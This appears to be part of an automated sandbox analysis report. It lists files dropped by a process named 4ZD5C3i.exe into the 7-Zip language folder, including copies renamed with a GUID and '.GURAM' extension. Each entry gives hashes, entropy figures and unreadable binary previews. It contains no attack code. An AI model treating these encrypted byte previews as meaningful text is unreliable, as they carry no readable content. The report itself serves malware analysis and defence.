                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ta.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13069
                                                                                                                                                                                                                                                Entropy (8bit):7.984358556866305
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:mwUln08/yKU++7d1e19Mm4toqn5So/1HDb4sila:mwUlnB/1+J1e/78S+1X4Zla
                                                                                                                                                                                                                                                MD5:228FF3B15A42EA04804097CF4A58A3FA
                                                                                                                                                                                                                                                SHA1:E3215D675273869BF89D61B0FCAA83A4D1030923
                                                                                                                                                                                                                                                SHA-256:1AFD6C4E3A9F898735B4CC4EA74F1DDD0D1A8B9A541620CD6A1B1BF4A25CF2EE
                                                                                                                                                                                                                                                SHA-512:FD231B113856785EB0F84170882DF68B6ADEC69B3FF51C75835F4EFD9DDD3B11C4864E5A5CBC0A462439EF0098EDD11BA7DBAABF86E718F85BD867DBE181A9E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:5^.@..y7........S..=AC+..}(..=..`.GkG...P...1a...'../...z..7.0...WI..C.|..~....8A.-....]...]`..w..[.4...$6U..J....e._}}..G\.o......Wp.RGu.n (1N0....Oa}...M:%T.....V......SA.zOS..._Qi@?.L....mA.....7.\...F5.;.UO........%..NU.$...|p.h.'..h.....J.F_.._ .....L{..:...,W..o.?v..N.iKe.=f.M...F...'..1YU&>.c;.....v......:.ef.......Z....s.....S...:P.....%FS..xeTf8..3.CT.........i8....v.!/..)=C.F.Z...^j....f.nT..K...Uk.r...'M.w.'...Vl..@4.WB....n..WZ....Oz.7.aCc.].9..@.!....3.,h.f\.P.y.....].[l.........].n....R.OKM...{......Ct.?....NQ}A-!^U=?(.,..C.....K.F...,GD.O.5j8y.2q........3v..'j...2m.D5.......s..f.H.4....a......h....h....f...N.8...6r....I[....Z...3....A..t=.+...UI}]..&...u.80..Ch.ynWf0.'T.im9J..U|../7..E....V.Rg..u.....%.GNRuuCl....~..j.?S\$..I>%u.)6r.8......V.b9.k./"..Z.1s....|.fgK_.....[...~h...Z.x*+.yD.(.._&..l..M.I.d.....EN.Yq....F.-I..{Q...r'|.........y,.h.1.........6W..O..U......md..MN.T..h...[....M..1./..e.u..<g.....a...P.X.:}jb.3o7..8......

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\tg.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15735
                                                                                                                                                                                                                                                Entropy (8bit):7.988806958097688
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:29Ejh/2d8lnztX+aYGP+X8negUWP8IEbk02AF:+Ej0OlnzqGP67WKF
                                                                                                                                                                                                                                                MD5:C126B1F6F053359B04DAA3CED78563EC
                                                                                                                                                                                                                                                SHA1:F2F37069409D05801B61574912394BA810DDB5BC
                                                                                                                                                                                                                                                SHA-256:B061D099F84220960CC7E488421AA623625AC0D3B44B75E6CD73A54354889263
                                                                                                                                                                                                                                                SHA-512:0A00BFB37C913E80D04B73693392BF1D21234CAB966233CC485B816651AC31D74A3945858DA6069E07240CB4EA01D4C7941A39C4191096F501BD6B8CFCDA2367
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:!.)}.wY..8....1./.#..:.?1/.......c....~.72......d..i.N.{?.fX.4.f....o.....A.T._Z..%.M.\.kA...4.oW c...pS..e..\H6.."7^.X.....l.V..6XFTA....{.9U......6#f.t....2.x{..p......@.~..~2.^...$.+.H#..i.8....9..%.#.d...KJ.~X....2.Uw.......#-LP..!!.iG/....U..)..:.W..7K.+&.?5....s...S.A...Z.D.-T.../*...dy..z.......2.c.....{.{A.{..K>....R.QL....UZ5P..L.:4.....Y.#.2....#b..8.`Y3.L.=...;.....1....SXy.t..@O.j.c....}.8.!K.nr.W.C)... .8Z...i.....P..^.C=..g.....q.-?.....2.@.H...f..r"..Ry.|o<....8....v......Zi.b..L^E.mM...L.e...........D..+..4d...9...I"..N...X|'..(...N.H..._\@.*..0.h...@.v..GN..t.(O.+.\y.a..k'...aW..a...X..J...,.b...L...\%.o.....#.....}.IX..v..=M..=1.6.R.z2.5.....B...-.a.....1..]@t...3...H.....>SkQ.i........g....L.s-..Xx...%..b...;.......6.......4.Jk..R....#.5...p.Ah\.}...L..k......u...v.5.`a..K~..7Tz.X..{.F...:.V.......q%4.'.0.8.".U..Ge?...5.0.......1)..K...:...6.....Q...<3F^{C..1....W*...2p.........7..=^h..I.i....l{lz_.......D.o...d'..v.?&.k.i.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\tg.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15735
                                                                                                                                                                                                                                                Entropy (8bit):7.988806958097688
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:29Ejh/2d8lnztX+aYGP+X8negUWP8IEbk02AF:+Ej0OlnzqGP67WKF
                                                                                                                                                                                                                                                MD5:C126B1F6F053359B04DAA3CED78563EC
                                                                                                                                                                                                                                                SHA1:F2F37069409D05801B61574912394BA810DDB5BC
                                                                                                                                                                                                                                                SHA-256:B061D099F84220960CC7E488421AA623625AC0D3B44B75E6CD73A54354889263
                                                                                                                                                                                                                                                SHA-512:0A00BFB37C913E80D04B73693392BF1D21234CAB966233CC485B816651AC31D74A3945858DA6069E07240CB4EA01D4C7941A39C4191096F501BD6B8CFCDA2367
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:!.)}.wY..8....1./.#..:.?1/.......c....~.72......d..i.N.{?.fX.4.f....o.....A.T._Z..%.M.\.kA...4.oW c...pS..e..\H6.."7^.X.....l.V..6XFTA....{.9U......6#f.t....2.x{..p......@.~..~2.^...$.+.H#..i.8....9..%.#.d...KJ.~X....2.Uw.......#-LP..!!.iG/....U..)..:.W..7K.+&.?5....s...S.A...Z.D.-T.../*...dy..z.......2.c.....{.{A.{..K>....R.QL....UZ5P..L.:4.....Y.#.2....#b..8.`Y3.L.=...;.....1....SXy.t..@O.j.c....}.8.!K.nr.W.C)... .8Z...i.....P..^.C=..g.....q.-?.....2.@.H...f..r"..Ry.|o<....8....v......Zi.b..L^E.mM...L.e...........D..+..4d...9...I"..N...X|'..(...N.H..._\@.*..0.h...@.v..GN..t.(O.+.\y.a..k'...aW..a...X..J...,.b...L...\%.o.....#.....}.IX..v..=M..=1.6.R.z2.5.....B...-.a.....1..]@t...3...H.....>SkQ.i........g....L.s-..Xx...%..b...;.......6.......4.Jk..R....#.5...p.Ah\.}...L..k......u...v.5.`a..K~..7Tz.X..{.F...:.V.......q%4.'.0.8.".U..Ge?...5.0.......1)..K...:...6.....Q...<3F^{C..1....W*...2p.........7..=^h..I.i....l{lz_.......D.o...d'..v.?&.k.i.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\th.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16462
                                                                                                                                                                                                                                                Entropy (8bit):7.989481763132761
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:05elJM2YzdyV3zk1ZlKjEebfDoCpcdWgHaxB7Q9KJ:0crdSPQ1BPNBE9KJ
                                                                                                                                                                                                                                                MD5:DBC32477BC409F62C57EC0E1C38DEE91
                                                                                                                                                                                                                                                SHA1:F5093E17F630C1AEE2586238DA3DAA1A20B82DE9
                                                                                                                                                                                                                                                SHA-256:6BD2BDD5B8FC3C65CDEEE4C14C7619F40C02CF7723E7AF7D3858E4B562140F1A
                                                                                                                                                                                                                                                SHA-512:FEA8EDF5EDBF64300468B08E48C8028156427DEE4F6EDA86EEA99B4CBB832CA94F4B29AC150D7EF473E83439DE59E30C97FE697C62D97B68D3294DEAB8ABA4FE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.b.%.169.....\.....E._\?.e..mZ>....[._..@..................9....R4...w......u..0.....e2..*.....v]ZZ=...D{`jPkQZ[+!........i..6|.......0...(...Y.N3..9...w.\....1)Cq. ..Kp,.&.......1...#(<=As.Z.....X..._.]..7..3...E....O.O.....7._.wo^..e....5..Z.%F.M....@f@.....Qj=.._...T.../L9...a>)...].........x...F...0rB.@...{.e8........B.......G....c....~.X.r.[}M{8.gWJe..MPs:..L.*......Y;2.z.....M0p.q..a./. ...}.)'..>..7p..!.0...|C..Nw{E........"~.......W......S7..)...$.-....Rp.k........\.>.h.v...$.E2N7.......E..L9J.v..A$.._.m...d..K6.P.....x..M..?kP..&.v.R.e..n..)l..6.....}...M.l.k.R...C.`?........a/..6..g.c.....e]Q..;[D.Tr.9I.NECJ.l.>....R.*....0...@..RO|b.......f....x.......t..Zb~`{....".........c.\.G.4.......dq.u...6...I.._|.%.8..b..}.|.AQ]A.p....U.g<.D..~M.jY.?}.y....B.d....N......`G...)t z. ......K4.V.i..`6.F......-...,..mSx.&-.>.r....1..P..'.@S.><..83.v...wV....^.i..P....R:..A5Cz....I.h...r.....X..|....1P.-.(.0'..t%[.>....p1.]h..P..Z....%

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\th.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16462
                                                                                                                                                                                                                                                Entropy (8bit):7.989481763132761
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:05elJM2YzdyV3zk1ZlKjEebfDoCpcdWgHaxB7Q9KJ:0crdSPQ1BPNBE9KJ
                                                                                                                                                                                                                                                MD5:DBC32477BC409F62C57EC0E1C38DEE91
                                                                                                                                                                                                                                                SHA1:F5093E17F630C1AEE2586238DA3DAA1A20B82DE9
                                                                                                                                                                                                                                                SHA-256:6BD2BDD5B8FC3C65CDEEE4C14C7619F40C02CF7723E7AF7D3858E4B562140F1A
                                                                                                                                                                                                                                                SHA-512:FEA8EDF5EDBF64300468B08E48C8028156427DEE4F6EDA86EEA99B4CBB832CA94F4B29AC150D7EF473E83439DE59E30C97FE697C62D97B68D3294DEAB8ABA4FE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.b.%.169.....\.....E._\?.e..mZ>....[._..@..................9....R4...w......u..0.....e2..*.....v]ZZ=...D{`jPkQZ[+!........i..6|.......0...(...Y.N3..9...w.\....1)Cq. ..Kp,.&.......1...#(<=As.Z.....X..._.]..7..3...E....O.O.....7._.wo^..e....5..Z.%F.M....@f@.....Qj=.._...T.../L9...a>)...].........x...F...0rB.@...{.e8........B.......G....c....~.X.r.[}M{8.gWJe..MPs:..L.*......Y;2.z.....M0p.q..a./. ...}.)'..>..7p..!.0...|C..Nw{E........"~.......W......S7..)...$.-....Rp.k........\.>.h.v...$.E2N7.......E..L9J.v..A$.._.m...d..K6.P.....x..M..?kP..&.v.R.e..n..)l..6.....}...M.l.k.R...C.`?........a/..6..g.c.....e]Q..;[D.Tr.9I.NECJ.l.>....R.*....0...@..RO|b.......f....x.......t..Zb~`{....".........c.\.G.4.......dq.u...6...I.._|.%.8..b..}.|.AQ]A.p....U.g<.D..~M.jY.?}.y....B.d....N......`G...)t z. ......K4.V.i..`6.F......-...,..mSx.&-.>.r....1..P..'.@S.><..83.v...wV....^.i..P....R:..A5Cz....I.h...r.....X..|....1P.-.(.0'..t%[.>....p1.]h..P..Z....%

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\tk.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9839
                                                                                                                                                                                                                                                Entropy (8bit):7.980710968083644
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:gz24h9QzQmW9Gx+JAnxtd37P1QeMAPKgTGZeDsczl+iuCwkKbiC4UC:ZcQg9a+inx3LPrMAPJGZysqMkKpfC
                                                                                                                                                                                                                                                MD5:5D9E54F54F17ED36AB99740ADE16C426
                                                                                                                                                                                                                                                SHA1:79768EE90AD6770155CC21995AD7FEF9D343856C
                                                                                                                                                                                                                                                SHA-256:18A3422118C075E48F680B35EE48AAEA8EEEAF5B2F727FF7E88598591ACDA9CA
                                                                                                                                                                                                                                                SHA-512:3D630D2FBBE765B6F4F2C535BB264CE52E2C1F1F3B57336F3E36227F558A74039E0C3BEAF272F96966911F016D028689F2B770DC397F8E45D3F17BAFB9825CD2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..~...4..;_..&.%...$*.........X..cpFd..O...._f..P\7....$./.e..I>.>.".O....:.$c.....n......*;..._.:>..5.F...`.j....Qa.........d..W..Kb...^.....<VN.L..3..f.;....0..*..xg...m.YW...j_.n|.9....r...vQ.H.N6V...nE#=......U..B..,..)E...n.}.......v.3.J.L.pOB....cX..........u.;..[F-58.........f....a.U..*..b..5...3.....!I....!5e..{/^.........5...c.;&.........E{t.......W."g.QP...x8..st.....s......../.J.[+..K...8U.v..9..y2.>y......;.?.5.W..]...H.y...IT...y.B.0.=..F...G..J.Hf=.d...LJt..K.6..../.y. .....c.s..6..:B.~.....WOL.-.]....?..f..b0...y....p..V..AGMHi....^M..8=~3..F.M...^..Y.-..6....&.....n.^..0)H.r._...O.]T.g...(Gm..d;..C.9.S......4....".<.......m^^I.:. ..p+ZY'..5Z...v*........^.!..IK.l.3.n.R\..:M.^..<.;V.....L.........,L.%K.....U.f. vf........B.ajv.a.q....K..(.kUt....fs......f.o..WI5J.-..R..uy&.r..Go..!Xj...QH....b.r7L....)..:w...aNR.m.T.a.Y..7,.(Um.o.h:...G....?!./?Ap.?/.Qt{-......l.............h../'q..,2.....G3.D.!%..2..sZ...P<...:

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\tk.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9839
                                                                                                                                                                                                                                                Entropy (8bit):7.980710968083644
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:gz24h9QzQmW9Gx+JAnxtd37P1QeMAPKgTGZeDsczl+iuCwkKbiC4UC:ZcQg9a+inx3LPrMAPJGZysqMkKpfC
                                                                                                                                                                                                                                                MD5:5D9E54F54F17ED36AB99740ADE16C426
                                                                                                                                                                                                                                                SHA1:79768EE90AD6770155CC21995AD7FEF9D343856C
                                                                                                                                                                                                                                                SHA-256:18A3422118C075E48F680B35EE48AAEA8EEEAF5B2F727FF7E88598591ACDA9CA
                                                                                                                                                                                                                                                SHA-512:3D630D2FBBE765B6F4F2C535BB264CE52E2C1F1F3B57336F3E36227F558A74039E0C3BEAF272F96966911F016D028689F2B770DC397F8E45D3F17BAFB9825CD2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..~...4..;_..&.%...$*.........X..cpFd..O...._f..P\7....$./.e..I>.>.".O....:.$c.....n......*;..._.:>..5.F...`.j....Qa.........d..W..Kb...^.....<VN.L..3..f.;....0..*..xg...m.YW...j_.n|.9....r...vQ.H.N6V...nE#=......U..B..,..)E...n.}.......v.3.J.L.pOB....cX..........u.;..[F-58.........f....a.U..*..b..5...3.....!I....!5e..{/^.........5...c.;&.........E{t.......W."g.QP...x8..st.....s......../.J.[+..K...8U.v..9..y2.>y......;.?.5.W..]...H.y...IT...y.B.0.=..F...G..J.Hf=.d...LJt..K.6..../.y. .....c.s..6..:B.~.....WOL.-.]....?..f..b0...y....p..V..AGMHi....^M..8=~3..F.M...^..Y.-..6....&.....n.^..0)H.r._...O.]T.g...(Gm..d;..C.9.S......4....".<.......m^^I.:. ..p+ZY'..5Z...v*........^.!..IK.l.3.n.R\..:M.^..<.;V.....L.........,L.%K.....U.f. vf........B.ajv.a.q....K..(.kUt....fs......f.o..WI5J.-..R..uy&.r..Go..!Xj...QH....b.r7L....)..:w...aNR.m.T.a.Y..7,.(Um.o.h:...G....?!./?Ap.?/.Qt{-......l.............h../'q..,2.....G3.D.!%..2..sZ...P<...:

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\tr.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10455
                                                                                                                                                                                                                                                Entropy (8bit):7.981483364426631
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:04hATniQT+P0ufxtMe1Q13w2ySYr0aKhR25n8CVHGSOdVveMQUs:0YON+MufxtFC1AVSoZKhk8Cl9OVvHs
                                                                                                                                                                                                                                                MD5:421B814F4B24F102CFEE1477208CB840
                                                                                                                                                                                                                                                SHA1:80816371BB952711FC76B362592D3392DD6D2A10
                                                                                                                                                                                                                                                SHA-256:8B69533F9AB91D1D217C97B7E5CB4CB912230EF2FD8D9BE0E1EF32DE96185B37
                                                                                                                                                                                                                                                SHA-512:7A402B85EB4398D27ED8D01C20BF79AA4F3DC47D18C0266F3AC76B7C3A1DB969676E9B9670856618CD3EB937C64E6232B2ACF13C03576A932413CB73EADA0936
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..W...w.i,B........(L.k.2...f..>{gOPj..=Qr.Jst.8G.L.+.!.F"....4......xV..nUz.e..6.v].:......=.U..z< ...e...B}#.P..s...~.:..r.$@..6!.i.!....GQ{ ..L6.L..$.$.q....}......9.o.J..Z...{.l......r.qs./.Z8'..-.Y.B...k...X..#.Z.4d...xA..)s.>`.....4...A......D../..q}.$.....L.5....w.#...I..@;.l..5k....V....`r./,.....|....V.n...:..<....A.R....O,.I.H.}.....:..f.......arK..~....4.....q.......4...sB..9.Jx....|.78...Q.b3.;1.pf/s...%bkf.......]q..&.a...q..\h\r*....oQ....C.|....>.}..h.E....?.c......9.~...2#..>...mB..~...~.....Q!.......k+..h..WT?..p!..D..M..G.g....#d;....xxH..K.F..;>......r8. ...".^.\.....'.......'.....a..!.P...Ngjs..5.A..=..w.@/....G..-.X.....Ohq81..$f.67.....X.'....%....7i...f.....H......D.....L....=.Wmz.Z...7...........]1.t...4s..............{.CX..!D...p.....]...%..'.V.....B..@>.=....:..:...qA.5{@.wkY.k...}.y...(..(3....}[.M.[.8.Af&..J........E.UH..4.j(..7..&M..gnu..k<...K5g_.;.B..9..1..-.c...+.K.{.m... .......U.~-3.x+..8...%|..a"9.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\tr.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10455
                                                                                                                                                                                                                                                Entropy (8bit):7.981483364426631
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:04hATniQT+P0ufxtMe1Q13w2ySYr0aKhR25n8CVHGSOdVveMQUs:0YON+MufxtFC1AVSoZKhk8Cl9OVvHs
                                                                                                                                                                                                                                                MD5:421B814F4B24F102CFEE1477208CB840
                                                                                                                                                                                                                                                SHA1:80816371BB952711FC76B362592D3392DD6D2A10
                                                                                                                                                                                                                                                SHA-256:8B69533F9AB91D1D217C97B7E5CB4CB912230EF2FD8D9BE0E1EF32DE96185B37
                                                                                                                                                                                                                                                SHA-512:7A402B85EB4398D27ED8D01C20BF79AA4F3DC47D18C0266F3AC76B7C3A1DB969676E9B9670856618CD3EB937C64E6232B2ACF13C03576A932413CB73EADA0936
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..W...w.i,B........(L.k.2...f..>{gOPj..=Qr.Jst.8G.L.+.!.F"....4......xV..nUz.e..6.v].:......=.U..z< ...e...B}#.P..s...~.:..r.$@..6!.i.!....GQ{ ..L6.L..$.$.q....}......9.o.J..Z...{.l......r.qs./.Z8'..-.Y.B...k...X..#.Z.4d...xA..)s.>`.....4...A......D../..q}.$.....L.5....w.#...I..@;.l..5k....V....`r./,.....|....V.n...:..<....A.R....O,.I.H.}.....:..f.......arK..~....4.....q.......4...sB..9.Jx....|.78...Q.b3.;1.pf/s...%bkf.......]q..&.a...q..\h\r*....oQ....C.|....>.}..h.E....?.c......9.~...2#..>...mB..~...~.....Q!.......k+..h..WT?..p!..D..M..G.g....#d;....xxH..K.F..;>......r8. ...".^.\.....'.......'.....a..!.P...Ngjs..5.A..=..w.@/....G..-.X.....Ohq81..$f.67.....X.'....%....7i...f.....H......D.....L....=.Wmz.Z...7...........]1.t...4s..............{.CX..!D...p.....]...%..'.V.....B..@>.=....:..:...qA.5{@.wkY.k...}.y...(..(3....}[.M.[.8.Af&..J........E.UH..4.j(..7..&M..gnu..k<...K5g_.;.B..9..1..-.c...+.K.{.m... .......U.~-3.x+..8...%|..a"9.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\tt.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):14809
                                                                                                                                                                                                                                                Entropy (8bit):7.986941084283473
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:f/c1GkZElBsY5yYTi5xKAAX5WjRJNCTBFJotmX:f/8GkZElBsY59PWjQlotmX
                                                                                                                                                                                                                                                MD5:786F6C288106C6BB9BAD64F92AE9E3AF
                                                                                                                                                                                                                                                SHA1:46A944CCC7923366F84C3FDA5D921A45C8E72095
                                                                                                                                                                                                                                                SHA-256:9528459B907861E65808F0BE6D9A4688B59EA665FBACCC7E1D2B39EFDB8DF64E
                                                                                                                                                                                                                                                SHA-512:7FF06505B52510386A9D6F78999D669E78A0A5499B10F0A791D6246842A9F37C0F4CFAB98A1B03399A9977E4DDD6D8E58B6DB42A541227D112924FF9A217EC7B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....].5.P...Y'..Q.!...6...>..X......Q..C).Y.Q..xK\.d......;..0.z.......|./..H~...T..q.P..........Hc.....7.KM{..a....Z.o.<...'.7.\*...f....U.0.........o..#yp.....3.;..K....`i.a.+........&..0..@."7..\D..o.xE...9w..0..zd+IS[...#.C.....$(..f8.r....L"..`.,..@TE........1."..1.......R.^.u..t...W.U......Im.t.}.b....8.9..-...EOB3.|.A&h.......<y)J..,.^G....4.g.'...r~v.m....0.w..&.P..\._@.i.-.hf..9Ur3Q%..Ls..%...u:s...J.J..i...<.u...i.w..1^...?._ ...T.k.PN2-.~..Vl.#P)-...G..s..u..A!...Q..t...C.T.b.j;/...Z.:...+..R...s...&...L....y.B..V...<=^.;.H.......y...9.\7f..R..c..Jt.....'.}.....B.....!.!:g..{~.i..p...K8.X=nV.|.Pz..B..u....;.S....~S.QO../..S..^.M...1S...'3g..................q..........9....)....Y..d.O.]j...O...,.../...e.o.....?._}..Ka.a.l.a*...#.+..7.DM.5.h6.M.W.... |..a.G.W{9`t..O..![k...@....,.;.f.9...a...B..{L...uT.....<......+2...KXfvU..$5:s......sd$......C......#&....D:...8......-.,.*l.....X..l....B.j..F..S..W.....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\tt.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):14809
                                                                                                                                                                                                                                                Entropy (8bit):7.986941084283473
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:f/c1GkZElBsY5yYTi5xKAAX5WjRJNCTBFJotmX:f/8GkZElBsY59PWjQlotmX
                                                                                                                                                                                                                                                MD5:786F6C288106C6BB9BAD64F92AE9E3AF
                                                                                                                                                                                                                                                SHA1:46A944CCC7923366F84C3FDA5D921A45C8E72095
                                                                                                                                                                                                                                                SHA-256:9528459B907861E65808F0BE6D9A4688B59EA665FBACCC7E1D2B39EFDB8DF64E
                                                                                                                                                                                                                                                SHA-512:7FF06505B52510386A9D6F78999D669E78A0A5499B10F0A791D6246842A9F37C0F4CFAB98A1B03399A9977E4DDD6D8E58B6DB42A541227D112924FF9A217EC7B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....].5.P...Y'..Q.!...6...>..X......Q..C).Y.Q..xK\.d......;..0.z.......|./..H~...T..q.P..........Hc.....7.KM{..a....Z.o.<...'.7.\*...f....U.0.........o..#yp.....3.;..K....`i.a.+........&..0..@."7..\D..o.xE...9w..0..zd+IS[...#.C.....$(..f8.r....L"..`.,..@TE........1."..1.......R.^.u..t...W.U......Im.t.}.b....8.9..-...EOB3.|.A&h.......<y)J..,.^G....4.g.'...r~v.m....0.w..&.P..\._@.i.-.hf..9Ur3Q%..Ls..%...u:s...J.J..i...<.u...i.w..1^...?._ ...T.k.PN2-.~..Vl.#P)-...G..s..u..A!...Q..t...C.T.b.j;/...Z.:...+..R...s...&...L....y.B..V...<=^.;.H.......y...9.\7f..R..c..Jt.....'.}.....B.....!.!:g..{~.i..p...K8.X=nV.|.Pz..B..u....;.S....~S.QO../..S..^.M...1S...'3g..................q..........9....)....Y..d.O.]j...O...,.../...e.o.....?._}..Ka.a.l.a*...#.+..7.DM.5.h6.M.W.... |..a.G.W{9`t..O..![k...@....,.;.f.9...a...B..{L...uT.....<......+2...KXfvU..$5:s......sd$......C......#&....D:...8......-.,.*l.....X..l....B.j..F..S..W.....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ug.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11994
                                                                                                                                                                                                                                                Entropy (8bit):7.984197046859827
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:65ZSrtenbNfPAs59xvaDlpk3rTI1CmoI8zmBkb5VJf+5SO8xbvEeuWbnKWIu4MUr:KZSr8Hx9FGevI8moI8z1/Ncj8t0W+hug
                                                                                                                                                                                                                                                MD5:36DBA2B6BAFF822E716C1AB51E47B62F
                                                                                                                                                                                                                                                SHA1:3533C994BE1590533A10EAD3F05E68F2C5AF3BEE
                                                                                                                                                                                                                                                SHA-256:49A635482D610771FACE68A74E1B3709B3279AD6B5140E072E2529CF429C96F8
                                                                                                                                                                                                                                                SHA-512:9398ACC8761102EB65D94C5DAAB9584BBF3CB1C9333BF50D99F5C66A5F40402BEC151D89B578981E7CDD3AC3C56EA98929A63B0A8F1E6CC019FB54C1A4520235
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
